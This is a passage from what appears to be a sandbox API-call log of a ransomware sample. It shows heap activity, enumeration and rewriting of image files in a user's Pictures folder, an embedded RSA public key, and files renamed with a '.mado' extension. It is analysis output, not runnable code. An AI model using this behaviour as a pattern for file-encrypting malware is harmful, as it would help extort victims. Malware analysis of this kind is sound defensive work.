lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79dd0 [0207.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0207.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x3b79da0 [0207.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0207.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x3b79d88 [0207.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0207.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b75a80 [0207.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0207.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0207.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0207.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b75b98 [0207.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0207.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0207.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75a80 | out: hHeap=0x2c0000) returned 1 [0207.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79da0 | out: hHeap=0x2c0000) returned 1 [0207.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0207.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d88 | out: hHeap=0x2c0000) returned 1 [0207.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0207.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0207.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79dd0 | out: hHeap=0x2c0000) returned 1 [0207.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0207.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0207.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0207.131] GetCurrentThreadId () returned 0x600 [0207.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b817b0 [0207.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b7b5c8 [0207.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0207.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0207.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x32c64e8 [0207.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0207.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0207.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b818b8 [0207.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0207.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0207.132] GetCurrentThreadId () returned 0x600 [0207.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0207.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0207.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0207.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0207.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0207.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0207.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0207.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0207.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b819c0 [0207.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0207.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0207.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0207.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b81ac8 [0207.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0207.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79dd0 [0207.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0207.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0207.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0207.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0207.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0207.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0207.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0207.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0207.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d88 [0207.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0207.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0207.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0207.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0207.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0207.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0207.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0207.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79da0 [0207.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0207.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0207.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0207.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d70 [0207.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0207.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79de8 [0207.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0207.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0207.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0207.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79db8 [0207.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0207.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79e00 [0207.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0207.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0207.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0207.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0207.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0207.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0207.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d88 | out: hHeap=0x2c0000) returned 1 [0207.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d88 [0207.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0207.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0207.134] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x13816, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0207.134] WriteFile (in: hFile=0x63c, lpBuffer=0x3b817b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b817b0*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0207.134] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0207.134] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0207.134] CloseHandle (hObject=0x63c) returned 1 [0207.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b817b0 [0207.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x910) returned 0x3b7b950 [0207.136] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\ar_JzZLjw MdzmtPt.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\pfhcel7tqaytpink7jng\\ar_jzzljw mdzmtpt.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\ar_JzZLjw MdzmtPt.gif.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\pfhcel7tqaytpink7jng\\ar_jzzljw mdzmtpt.gif.mado")) returned 1 [0207.137] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2702a00, ftCreationTime.dwHighDateTime=0x1d5e158, ftLastAccessTime.dwLowDateTime=0xa4195740, ftLastAccessTime.dwHighDateTime=0x1d5e61a, ftLastWriteTime.dwLowDateTime=0xa4195740, ftLastWriteTime.dwHighDateTime=0x1d5e61a, nFileSizeHigh=0x0, nFileSizeLow=0x113ec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AV Dqy0T.bmp", cAlternateFileName="AVDQY0~1.BMP")) returned 1 [0207.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd0) returned 0x3292eb8 [0207.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x136) returned 0x336fe98 [0207.138] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\AV Dqy0T.bmp") returned=".bmp" [0207.138] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\AV Dqy0T.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\pfhcel7tqaytpink7jng\\av dqy0t.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0207.138] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=70636) returned 1 [0207.138] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0207.140] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x113c6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0207.140] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0207.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0207.142] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x113ec, lpOverlapped=0x0) returned 1 [0207.143] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0207.143] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.143] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.143] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0207.144] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0207.144] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0207.144] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0207.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0207.144] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0207.144] GetLastError () returned 0x0 [0207.144] CryptDestroyHash (hHash=0x32ef238) returned 1 [0207.144] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0207.144] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0207.144] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0207.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0207.144] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0207.144] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0207.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0207.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79da0 | out: hHeap=0x2c0000) returned 1 [0207.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79db8 | out: hHeap=0x2c0000) returned 1 [0207.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79de8 | out: hHeap=0x2c0000) returned 1 [0207.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0207.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79de8 [0207.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0207.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x3b79db8 [0207.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0207.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x3b79da0 [0207.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0207.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b75b98 [0207.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0207.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0207.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0207.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b75cb0 [0207.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0207.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0207.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75b98 | out: hHeap=0x2c0000) returned 1 [0207.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79db8 | out: hHeap=0x2c0000) returned 1 [0207.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0207.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79da0 | out: hHeap=0x2c0000) returned 1 [0207.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0207.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0207.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79de8 | out: hHeap=0x2c0000) returned 1 [0207.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0207.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0207.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0207.146] GetCurrentThreadId () returned 0x600 [0207.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b817b0 [0207.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b7b658 [0207.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0207.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0207.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x32c64e8 [0207.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0207.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0207.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b81ac8 [0207.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0207.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0207.146] GetCurrentThreadId () returned 0x600 [0207.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0207.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0207.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0207.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0207.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0207.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0207.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0207.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0207.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b818b8 [0207.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0207.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0207.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0207.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b81bd0 [0207.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0207.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79de8 [0207.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0207.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0207.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0207.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0207.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0207.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0207.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0207.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0207.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79da0 [0207.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0207.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0207.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0207.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0207.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0207.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0207.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0207.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79db8 [0207.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0207.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0207.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0207.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d88 [0207.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0207.147] 